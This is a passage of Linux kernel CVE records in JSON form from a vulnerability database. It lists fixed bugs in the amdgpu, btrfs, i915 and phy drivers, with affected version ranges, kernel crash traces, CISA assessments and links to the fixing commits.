"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ff5c4eb71ee8951c789b079f6e948f86708b04ed",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "d81c1eeb333d84b3012a91c0500189dc1d71e46c",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "56e848034ccabe44e8f22ffcf49db771c17b0d0a",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "48cada0ac79e4775236d642e9ec5998a7c7fb7a4",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "b89616333979114bb0da5fa40fb6e4a2f5294ca2",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "033187a70ba9743c73a810a006816e5553d1e7d4",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "4c11d30c95576937c6c35e6f29884761f2dddb43",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix the null pointer dereference to ras_manager\n\nCheck ras_manager before using it"
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T08:02:44.746Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ff5c4eb71ee8951c789b079f6e948f86708b04ed"
},
{
"url": "https://git.kernel.org/stable/c/d81c1eeb333d84b3012a91c0500189dc1d71e46c"
},
{
"url": "https://git.kernel.org/stable/c/56e848034ccabe44e8f22ffcf49db771c17b0d0a"
},
{
"url": "https://git.kernel.org/stable/c/48cada0ac79e4775236d642e9ec5998a7c7fb7a4"
},
{
"url": "https://git.kernel.org/stable/c/b89616333979114bb0da5fa40fb6e4a2f5294ca2"
},
{
"url": "https://git.kernel.org/stable/c/033187a70ba9743c73a810a006816e5553d1e7d4"
},
{
"url": "https://git.kernel.org/stable/c/4c11d30c95576937c6c35e6f29884761f2dddb43"
}
],
"title": "drm/amdgpu: Fix the null pointer dereference to ras_manager",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43908",
"datePublished": "2024-08-26T10:11:11.411Z",
"dateReserved": "2024-08-17T09:11:59.293Z",
"dateUpdated": "2025-09-16T08:02:44.746Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48903 (GCVE-0-2022-48903)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix relocation crash due to premature return from btrfs_commit_transaction()
We are seeing crashes similar to the following trace:
[38.969182] WARNING: CPU: 20 PID: 2105 at fs/btrfs/relocation.c:4070 btrfs_relocate_block_group+0x2dc/0x340 [btrfs]
[38.973556] CPU: 20 PID: 2105 Comm: btrfs Not tainted 5.17.0-rc4 #54
[38.974580] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
[38.976539] RIP: 0010:btrfs_relocate_block_group+0x2dc/0x340 [btrfs]
[38.980336] RSP: 0000:ffffb0dd42e03c20 EFLAGS: 00010206
[38.981218] RAX: ffff96cfc4ede800 RBX: ffff96cfc3ce0000 RCX: 000000000002ca14
[38.982560] RDX: 0000000000000000 RSI: 4cfd109a0bcb5d7f RDI: ffff96cfc3ce0360
[38.983619] RBP: ffff96cfc309c000 R08: 0000000000000000 R09: 0000000000000000
[38.984678] R10: ffff96cec0000001 R11: ffffe84c80000000 R12: ffff96cfc4ede800
[38.985735] R13: 0000000000000000 R14: 0000000000000000 R15: ffff96cfc3ce0360
[38.987146] FS: 00007f11c15218c0(0000) GS:ffff96d6dfb00000(0000) knlGS:0000000000000000
[38.988662] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[38.989398] CR2: 00007ffc922c8e60 CR3: 00000001147a6001 CR4: 0000000000370ee0
[38.990279] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[38.991219] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[38.992528] Call Trace:
[38.992854] <TASK>
[38.993148] btrfs_relocate_chunk+0x27/0xe0 [btrfs]
[38.993941] btrfs_balance+0x78e/0xea0 [btrfs]
[38.994801] ? vsnprintf+0x33c/0x520
[38.995368] ? __kmalloc_track_caller+0x351/0x440
[38.996198] btrfs_ioctl_balance+0x2b9/0x3a0 [btrfs]
[38.997084] btrfs_ioctl+0x11b0/0x2da0 [btrfs]
[38.997867] ? mod_objcg_state+0xee/0x340
[38.998552] ? seq_release+0x24/0x30
[38.999184] ? proc_nr_files+0x30/0x30
[38.999654] ? call_rcu+0xc8/0x2f0
[39.000228] ? __x64_sys_ioctl+0x84/0xc0
[39.000872] ? btrfs_ioctl_get_supported_features+0x30/0x30 [btrfs]
[39.001973] __x64_sys_ioctl+0x84/0xc0
[39.002566] do_syscall_64+0x3a/0x80
[39.003011] entry_SYSCALL_64_after_hwframe+0x44/0xae
[39.003735] RIP: 0033:0x7f11c166959b
[39.007324] RSP: 002b:00007fff2543e998 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[39.008521] RAX: ffffffffffffffda RBX: 00007f11c1521698 RCX: 00007f11c166959b
[39.009833] RDX: 00007fff2543ea40 RSI: 00000000c4009420 RDI: 0000000000000003
[39.011270] RBP: 0000000000000003 R08: 0000000000000013 R09: 00007f11c16f94e0
[39.012581] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff25440df3
[39.014046] R13: 0000000000000000 R14: 00007fff2543ea40 R15: 0000000000000001
[39.015040] </TASK>
[39.015418] ---[ end trace 0000000000000000 ]---
[43.131559] ------------[ cut here ]------------
[43.132234] kernel BUG at fs/btrfs/extent-tree.c:2717!
[43.133031] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[43.133702] CPU: 1 PID: 1839 Comm: btrfs Tainted: G W 5.17.0-rc4 #54
[43.134863] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
[43.136426] RIP: 0010:unpin_extent_range+0x37a/0x4f0 [btrfs]
[43.139913] RSP: 0000:ffffb0dd4216bc70 EFLAGS: 00010246
[43.140629] RAX: 0000000000000000 RBX: ffff96cfc34490f8 RCX: 0000000000000001
[43.141604] RDX: 0000000080000001 RSI: 0000000051d00000 RDI: 00000000ffffffff
[43.142645] RBP: 0000000000000000 R08: 0000000000000000 R09: ffff96cfd07dca50
[43.143669] R10: ffff96cfc46e8a00 R11: fffffffffffec000 R12: 0000000041d00000
[43.144657] R13: ffff96cfc3ce0000 R14: ffffb0dd4216bd08 R15: 0000000000000000
[43.145686] FS: 00007f7657dd68c0(0000) GS:ffff96d6df640000(0000) knlGS:0000000000000000
[43.146808] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[43.147584] CR2: 00007f7fe81bf5b0 CR3: 00000001093ee004 CR4: 0000000000370ee0
[43.148589] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[43.149581] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 00000000000
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48903",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:27.242407Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:12.359Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/transaction.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "725a6ac389b182261af174176e561a36b0f39ffc",
"status": "affected",
"version": "d0c2f4fa555e70324ec2a129b822ab58f172cc62",
"versionType": "git"
},
{
"lessThan": "a4378947ae39f08c6ae4c6a87ccdebc981a7bbcb",
"status": "affected",
"version": "d0c2f4fa555e70324ec2a129b822ab58f172cc62",
"versionType": "git"
},
{
"lessThan": "5fd76bf31ccfecc06e2e6b29f8c809e934085b99",
"status": "affected",
"version": "d0c2f4fa555e70324ec2a129b822ab58f172cc62",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/transaction.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix relocation crash due to premature return from btrfs_commit_transaction()\n\nWe are seeing crashes similar to the following trace:\n\n[38.969182] WARNING: CPU: 20 PID: 2105 at fs/btrfs/relocation.c:4070 btrfs_relocate_block_group+0x2dc/0x340 [btrfs]\n[38.973556] CPU: 20 PID: 2105 Comm: btrfs Not tainted 5.17.0-rc4 #54\n[38.974580] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\n[38.976539] RIP: 0010:btrfs_relocate_block_group+0x2dc/0x340 [btrfs]\n[38.980336] RSP: 0000:ffffb0dd42e03c20 EFLAGS: 00010206\n[38.981218] RAX: ffff96cfc4ede800 RBX: ffff96cfc3ce0000 RCX: 000000000002ca14\n[38.982560] RDX: 0000000000000000 RSI: 4cfd109a0bcb5d7f RDI: ffff96cfc3ce0360\n[38.983619] RBP: ffff96cfc309c000 R08: 0000000000000000 R09: 0000000000000000\n[38.984678] R10: ffff96cec0000001 R11: ffffe84c80000000 R12: ffff96cfc4ede800\n[38.985735] R13: 0000000000000000 R14: 0000000000000000 R15: ffff96cfc3ce0360\n[38.987146] FS: 00007f11c15218c0(0000) GS:ffff96d6dfb00000(0000) knlGS:0000000000000000\n[38.988662] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[38.989398] CR2: 00007ffc922c8e60 CR3: 00000001147a6001 CR4: 0000000000370ee0\n[38.990279] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[38.991219] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[38.992528] Call Trace:\n[38.992854] \u003cTASK\u003e\n[38.993148] btrfs_relocate_chunk+0x27/0xe0 [btrfs]\n[38.993941] btrfs_balance+0x78e/0xea0 [btrfs]\n[38.994801] ? vsnprintf+0x33c/0x520\n[38.995368] ? __kmalloc_track_caller+0x351/0x440\n[38.996198] btrfs_ioctl_balance+0x2b9/0x3a0 [btrfs]\n[38.997084] btrfs_ioctl+0x11b0/0x2da0 [btrfs]\n[38.997867] ? mod_objcg_state+0xee/0x340\n[38.998552] ? seq_release+0x24/0x30\n[38.999184] ? proc_nr_files+0x30/0x30\n[38.999654] ? call_rcu+0xc8/0x2f0\n[39.000228] ? __x64_sys_ioctl+0x84/0xc0\n[39.000872] ? btrfs_ioctl_get_supported_features+0x30/0x30 [btrfs]\n[39.001973] __x64_sys_ioctl+0x84/0xc0\n[39.002566] do_syscall_64+0x3a/0x80\n[39.003011] entry_SYSCALL_64_after_hwframe+0x44/0xae\n[39.003735] RIP: 0033:0x7f11c166959b\n[39.007324] RSP: 002b:00007fff2543e998 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\n[39.008521] RAX: ffffffffffffffda RBX: 00007f11c1521698 RCX: 00007f11c166959b\n[39.009833] RDX: 00007fff2543ea40 RSI: 00000000c4009420 RDI: 0000000000000003\n[39.011270] RBP: 0000000000000003 R08: 0000000000000013 R09: 00007f11c16f94e0\n[39.012581] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff25440df3\n[39.014046] R13: 0000000000000000 R14: 00007fff2543ea40 R15: 0000000000000001\n[39.015040] \u003c/TASK\u003e\n[39.015418] ---[ end trace 0000000000000000 ]---\n[43.131559] ------------[ cut here ]------------\n[43.132234] kernel BUG at fs/btrfs/extent-tree.c:2717!\n[43.133031] invalid opcode: 0000 [#1] PREEMPT SMP PTI\n[43.133702] CPU: 1 PID: 1839 Comm: btrfs Tainted: G W 5.17.0-rc4 #54\n[43.134863] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\n[43.136426] RIP: 0010:unpin_extent_range+0x37a/0x4f0 [btrfs]\n[43.139913] RSP: 0000:ffffb0dd4216bc70 EFLAGS: 00010246\n[43.140629] RAX: 0000000000000000 RBX: ffff96cfc34490f8 RCX: 0000000000000001\n[43.141604] RDX: 0000000080000001 RSI: 0000000051d00000 RDI: 00000000ffffffff\n[43.142645] RBP: 0000000000000000 R08: 0000000000000000 R09: ffff96cfd07dca50\n[43.143669] R10: ffff96cfc46e8a00 R11: fffffffffffec000 R12: 0000000041d00000\n[43.144657] R13: ffff96cfc3ce0000 R14: ffffb0dd4216bd08 R15: 0000000000000000\n[43.145686] FS: 00007f7657dd68c0(0000) GS:ffff96d6df640000(0000) knlGS:0000000000000000\n[43.146808] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[43.147584] CR2: 00007f7fe81bf5b0 CR3: 00000001093ee004 CR4: 0000000000370ee0\n[43.148589] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[43.149581] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 00000000000\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:47.961Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/725a6ac389b182261af174176e561a36b0f39ffc"
},
{
"url": "https://git.kernel.org/stable/c/a4378947ae39f08c6ae4c6a87ccdebc981a7bbcb"
},
{
"url": "https://git.kernel.org/stable/c/5fd76bf31ccfecc06e2e6b29f8c809e934085b99"
}
],
"title": "btrfs: fix relocation crash due to premature return from btrfs_commit_transaction()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48903",
"datePublished": "2024-08-22T01:30:21.518Z",
"dateReserved": "2024-08-21T06:06:23.292Z",
"dateUpdated": "2025-05-04T08:25:47.961Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48893 (GCVE-0-2022-48893)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/i915/gt: Cleanup partial engine discovery failures
If we abort driver initialisation in the middle of gt/engine discovery,
some engines will be fully setup and some not. Those incompletely setup
engines only have 'engine->release == NULL' and so will leak any of the
common objects allocated.
v2:
- Drop the destroy_pinned_context() helper for now. It's not really
worth it with just a single callsite at the moment. (Janusz)
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48893",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:15.684796Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:06.159Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_engine_cs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "78350c36fb15afef423404a83dcbc5c558dce795",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7d21587d35bc816c85a51b8686f0f7e8e676fb14",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5c855bcc730656c4b7d30aaddcd0eafc7003e112",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "78a033433a5ae4fee85511ee075bc9a48312c79e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_engine_cs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.237",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.181",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.237",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gt: Cleanup partial engine discovery failures\n\nIf we abort driver initialisation in the middle of gt/engine discovery,\nsome engines will be fully setup and some not. Those incompletely setup\nengines only have \u0027engine-\u003erelease == NULL\u0027 and so will leak any of the\ncommon objects allocated.\n\nv2:\n - Drop the destroy_pinned_context() helper for now. It\u0027s not really\n worth it with just a single callsite at the moment. (Janusz)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:37.838Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/78350c36fb15afef423404a83dcbc5c558dce795"
},
{
"url": "https://git.kernel.org/stable/c/7d21587d35bc816c85a51b8686f0f7e8e676fb14"
},
{
"url": "https://git.kernel.org/stable/c/5c855bcc730656c4b7d30aaddcd0eafc7003e112"
},
{
"url": "https://git.kernel.org/stable/c/78a033433a5ae4fee85511ee075bc9a48312c79e"
}
],
"title": "drm/i915/gt: Cleanup partial engine discovery failures",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48893",
"datePublished": "2024-08-21T06:10:25.448Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:37.838Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35945 (GCVE-0-2024-35945)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: phy: phy_device: Prevent nullptr exceptions on ISR
If phydev->irq is set unconditionally, check
for valid interrupt handler or fall back to polling mode to prevent
nullptr exceptions in interrupt service routine.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35945",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:11:47.084130Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:42.735Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.972Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a71f61ebf95cedd3f245db6da397822971d8db5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3419ee39e3d3162ab2ec9942bb537613ed5b6311"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61c81872815f46006982bb80460c0c80a949b35b"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/phy/phy_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7a71f61ebf95cedd3f245db6da397822971d8db5",
"status": "affected",
"version": "49644e68f472c6480e015253fa4d7448c6cfa2aa",
"versionType": "git"
},
{
"lessThan": "3419ee39e3d3162ab2ec9942bb537613ed5b6311",
"status": "affected",
"version": "49644e68f472c6480e015253fa4d7448c6cfa2aa",
"versionType": "git"
},
{
"lessThan": "61c81872815f46006982bb80460c0c80a949b35b",
"status": "affected",
"version": "49644e68f472c6480e015253fa4d7448c6cfa2aa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/phy/phy_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: phy_device: Prevent nullptr exceptions on ISR\n\nIf phydev-\u003eirq is set unconditionally, check\nfor valid interrupt handler or fall back to polling mode to prevent\nnullptr exceptions in interrupt service routine."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:40.907Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7a71f61ebf95cedd3f245db6da397822971d8db5"
},
{
"url": "https://git.kernel.org/stable/c/3419ee39e3d3162ab2ec9942bb537613ed5b6311"
},
{
"url": "https://git.kernel.org/stable/c/61c81872815f46006982bb80460c0c80a949b35b"
}
],
"title": "net: phy: phy_device: Prevent nullptr exceptions on ISR",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35945",
"datePublished": "2024-05-19T10:10:48.839Z",
"dateReserved": "2024-05-17T13:50:33.133Z",
"dateUpdated": "2025-05-21T09:12:40.907Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42120 (GCVE-0-2024-42120)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-07-11 17:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Check pipe offset before setting vblank
pipe_ctx has a size of MAX_PIPES so checking its index before accessing
the array.
This fixes an OVERRUN issue reported by Coverity.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
